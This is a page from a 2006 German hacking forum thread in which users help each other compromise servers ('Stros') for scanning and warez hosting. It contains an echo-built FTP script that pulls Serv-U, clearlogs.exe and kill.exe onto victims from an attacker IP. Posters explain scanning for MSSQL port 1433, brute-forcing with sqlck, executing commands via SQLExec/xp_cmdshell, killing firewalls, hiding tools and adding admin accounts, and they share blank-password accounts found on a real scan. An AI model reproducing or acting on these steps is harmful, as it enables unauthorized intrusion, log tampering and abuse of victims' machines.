Stro scannen

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von Scarface, 29. Juni 2006 .

Schlagworte:
Seite 2 von 3
  1. 29. Juni 2006
    proxy ist für weicheier 8)
     
    + Multi-Zitat Zitieren
  3. 29. Juni 2006
    hmm ok ich sach mal hoffentlich haste recht


    so habe nun alle 5 server die ich gefunden hab getestet mit "SQLExec" un der echo methode
    Code:
     Echo Open 111.222.333.444 21>>FTP.txt
Echo Test>>FTP.txt
Echo Test>>FTP.txt
Echo Binary>>FTP.txt
Echo Lcd c:winntSystem32>>FTP.txt
Echo GET Serv-U.exe>>FTP.txt
Echo GET Serv-U.ini>>FTP.txt
Echo Quit>>FTP.txt
    aber wenn ich die sachen eingegeben hab habsch keine antwort vom server bekommen
    Code:
     So jetzt Script starten.

ftp -n -v -s:c:ftpscr.txt

So jetzt müsst ihr paar Minuten warten. Man hat den Eindruck das Sqlexec abgekackt ist aber das ist nicht der Fall. Einfach warten.

Wenn alles geuppt ist bekommt ihr ungefaehr diese Meldung:

get serv-u.exe
get serv-u.ini
get clearlogs.exe
get kill.exe
get Fport.exe
    bei mir kommt entweder SQL_NO_DATA oder connection refused
     
    + Multi-Zitat Zitieren
  4. 29. Juni 2006
    geiler Comment @cool-max

    No risk no fun oder wie?! ^^ hehe

    Naja ich benutze auch kein Proxy oder besser gesagt habe keinen genutzt!

    Wenn du mssql und dann noch Asia scannst, dann passiert da nich soviel

    edit:

    Soweit ich weiß bekommt man da immer nur ein Ton zu hören wenn ein Kommand erfolgreich war.
    Oder war das nicht so?! (kein plan davon^^)

    Ich erkundige mich da mal, aber immer schön weiter scannern^^
     
    + Multi-Zitat Zitieren
  6. 30. Juni 2006
    also wenn da SQL_ERROR oder so kommt dann heißt das glaube ich das einer den str0 schon gehackt hat und ihn selber so gesichert hat das mit ihn nicht mehr oder nur schwer nochmal hacken kann. also kannst du alle deine scans die du da hast vergessen^^

    edit:

    an mYnon:

    no risk no fun das ist mein motto 8)
     
    + Multi-Zitat Zitieren
  7. 30. Juni 2006
    naja du kannst se nicht ganz vergessen nur musst du dafür noch Erfahrung mitbringen...

    Ich glaub das war irgendwas mit der Shell, das die gelöscht ist und du eigentlich blind und noch nichtmals mit Garantie für Erfolg, alles blind schrieben musst oder so.. irgendwie war das so..

    Aber jeder anfang ist schwer, lass dich nicht unterkriegen^^
     
    + Multi-Zitat Zitieren
  8. 30. Juni 2006
    @mYnon
    danke

    und unterkriegen lass ich mich net ist hallt alles ein wenig stressieg da ich nicht mehr machen kann in der zeit zb. cs zocken oder so dennn ich will ja zu erfolg kommen und scanne ca 100-150 treads
     
    + Multi-Zitat Zitieren
  9. 30. Juni 2006
    Kannst ja pc über nach laufen lassen oder wenn du nicht da bist..

    Ja das mit lokal scannen ist halt ein bisschen blöde...

    Aber sobald du deinen ersten scanstro hast, gehts voll ab^^
     
    + Multi-Zitat Zitieren
  10. 30. Juni 2006
    naja ich hoffe nur das mein alice net rumspackt und naja er läuft über nacht aber auch wenn ich den ganzen tag am rechner sitze

    und ja bis der stro da ist dauert das noch en bissl ^^ ich hoffe net mehr so lang grrr
     
    + Multi-Zitat Zitieren
  11. 30. Juni 2006
    wie gesagt ansonsten wenn du was gutes hast anbieten vieleicht haste glück
     
    + Multi-Zitat Zitieren
  12. 30. Juni 2006
    löl ^^ hab nichts zumindestens nicht gutes^^ habe erst gerade 250giga pladde mit stuff geschrottet wegen dem scheiss macos_x

    bin erst wieder am sammeln

    edit: hab en server mit 2 cleanen accs gefunden
    Code:
     Vulnerability netbios-ssn (139/tcp)
[b]NT-Server-Password - [/b]NT-Server-Password: "admin/[Blank password]"

Vulnerability netbios-ssn (139/tcp)
[b]NT-Server-Password - [/b]NT-Server-Password: "pailin/[Blank password]"
    was kann ich damit anfangen ?
     
    + Multi-Zitat Zitieren
  13. 30. Juni 2006
    Mh.. das scheint mir ja nach NTPW auszusehen, da hat irgendwer in diesem Thread auch schon was drübergeschrieben,musste halt mal zurückblettern und gucken


    Wenn das nicht der Fall ist, kA


    mfg

    edit:Hab mal gegooglt nach Netbios hacking: ein Tut -
    Ist leider auf Englisch aber man kann es ja mal ausprobieren ^^

    P.S.: Nach was scannst du denn alles?!"
     
    + Multi-Zitat Zitieren
  14. 30. Juni 2006
    nach allem was geht

    ich scanne mit X-Scan v3.3 nach sql ntpw und neben bei scanne ich mit ScanSql (aber da hab ich kein glück)
     
    + Multi-Zitat Zitieren
  15. 30. Juni 2006
    Schau mal nen Post drüber, da ist was ber NEtbios hacking in einem englischen Tut..

    Einfach mal google anschmeißen, auf english findest meistens was^^
     
    + Multi-Zitat Zitieren
  16. 30. Juni 2006
    hmm ich hab über nacht mal nach mssql server gescannt und hab auch 5 results, müsste die jetzt noch bruten aber ich weiß nich direkt wie das geht? =/ also wissen schon nur wie ich es zu 100% mache nich =/
    naja wäre nett wenn mir jemanden helfen könnte, gern auch per icq oder msn geht schneller, und ich denke das ich es auch schnell verstehen würde =/

    hab auch schon im board und im netz gesucht aber irgendwie nich direkt was gefunden =/ (oder ich bin blind) ^^

    hoffe meldet sich jemand! =)

    Gr33tz+Thx PhyT0n
     
    + Multi-Zitat Zitieren
  17. 30. Juni 2006
    hmm also ich hab damals nur von @ home gescannt und die irgendwelche probs gehabz weder beim scannen noch beim bruten aber egal is ja eure meinung

    also ich würde sagen für den anfang ein fach mal mit dfind oder so nach offenen 1433 ports scannen die dann mit sqlck bruten
    dann mit sqlexec sehen ob kein error weil den wirst du wohl noch nicht weg bekommen
    wenn kein error filez druff und server starten wenn es immer noch nicht geht firewall killen oder sehen ob router dazwischen wenn du dir net sicher bist ob nen router da is einfach dein prog(serv-u,etc.)mal auf port 21 laufen lassen wenn es immer noch net geht nächster scann usw.
     
    + Multi-Zitat Zitieren
  18. 30. Juni 2006
    Open Port 1433 bruten [MSSQL] bitte^^

    häääääääääääää?? hast du schon mal gelesen was du da schreibst?? next time plz verständlicher
     
    + Multi-Zitat Zitieren
  19. 30. Juni 2006
    Der hat ne KUrzbeschreibung von den einzelnen Schritte gemacht

    Dfind = Portscanner der über DOS läuft bzw. nur über ne Commandline(?)
    Also er guckt nur ob der Port offen ist und nicht ob ein Weakaccoutn sprich wie z.b. sa vorhanden ist.

    Dann Sqlck ist nen SQLbruter wie der Name schon sagt. Auch über Commandline(?).

    Die benutzt man meistens(denk ich mir mal so) um per remote nach sqls zu scannen/bruten.

    Ja sqlexec müsste eigentlich wissen was das ist ^^

    Und dann hat er halt beschrieben, dass man gucken sollte ob der SQL ne SQL Error hat und wenn nicht einfach das machen was auch in den Tuts steht.



    mfg

    @molli Die Zeiten haben sich halt geändert
     
    + Multi-Zitat Zitieren
  20. 30. Juni 2006
    So also hab alles gemacht und hab 2 die sind total in ordnung,kein error etc. und gebrutet sind die auch!
    einen möchte ich falls es möglich is als scanstro benutzen und den anderen für stuff
    nur wie secure ich die dsa mir die auch keiner wegnehmen kann? und wie bau ich mir darauf nen scanstro und nen schönen ftp server? =/ hab ihr mal was gesehen find das aber leider nich mehr
    hoffe mir kann dabei noch jemand helfen =/

    gr33tz+thx, 10ner wurden verteilt und gibts weiterhin für jede hilfe!!


    //Edit: hab wohl was übersehen, ist nur einer der in ordnung ist der andere zeigt mir leider nen error an =/

    aber dafür hat er schöne festplatten wie z.b. c,d,e,f,g ^^
    werd nachher mal das tut durchgehen und das machen, will jetzt erstmal bissle zocken *g*

    gr33tz+thx PhyT0n
     
    + Multi-Zitat Zitieren
  21. 30. Juni 2006
    Guck am besten in der TutSektion bei Leecher Upper Support...

    EInfach Stro securen und haxxon von mssql suchen

    Und hier auch ein Tut vom Haxxen bis zum securen

    -
     
    + Multi-Zitat Zitieren
  22. 30. Juni 2006
    leichter gesagt als getahn. man macht das ja mit Fport.exe richtig?

    wennn ich die immer ausführen will dann sagt er das ich ein admin oder so sein muss um das auszuführen X(
     
    + Multi-Zitat Zitieren
  23. 30. Juni 2006
    Dann nimm openports.exe, mit folgendem aufruf:
    Code:
    openports -lines -fport
    Zu den SQLErrors:
    Es gibt verschiedene Arten, wenn nur die xp_cmdshell weg ist, dann kann man die einfach neubauen. Wenn aber DLLs fehlen (xplog70.dll, odsole.dll) dann kannst du ihn vergessen (Ziemlich schwer die zu hacken)
     
    + Multi-Zitat Zitieren
  24. 30. Juni 2006
    ok ich hab en server ^^ muhaha²

    nun muss ich nurnoch versuchen den ftp zum laufen zu bekommen ...wo bekomme ich die "fport" und die "openports.exe" her?? und ich hab unter net start gesehen das der ne nod antivirus prog drauf hat

    aber wie kann ich denn auf den server zu greifen und scannen lassen??


    axo und der server hatt vnc drauf und sonn zeuch ist es möglich die psses zu ändern oder en 2ten admin an zu legen?? oder das nt pass auszulesen?
     
    + Multi-Zitat Zitieren
  25. 30. Juni 2006
    Mh... mit einer Shell sprich SQLexec kannst auf den Server zugriefn.. weiter kann ich dir leider nicht helfen^^

    Ehm.. und zum scannen.. Du musst ja erst den Serv-U zum laufen bekommen, dann connectest mit den Daten per FTp Progi auf deine Serv-u und dann lädst du die ganzen Dateien wie SQLck und dfind hoch aber auch noch hidden32.exe(dfind,sqlck verstecken) und kill.exe(prozess killen)
     
    + Multi-Zitat Zitieren
  26. 30. Juni 2006
    ahhhhhhhhhhhhh ftp läuft !!!!!!!! muhahahaha goil

    so nun noch den rest ^^



    [ironie]
    lol und wieder down
    [/ironie]

    nun ist der ftp on aber ping kann ich net lol
     
    + Multi-Zitat Zitieren
  27. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.

Auf dieses Thema antworten
Seite 2 von 3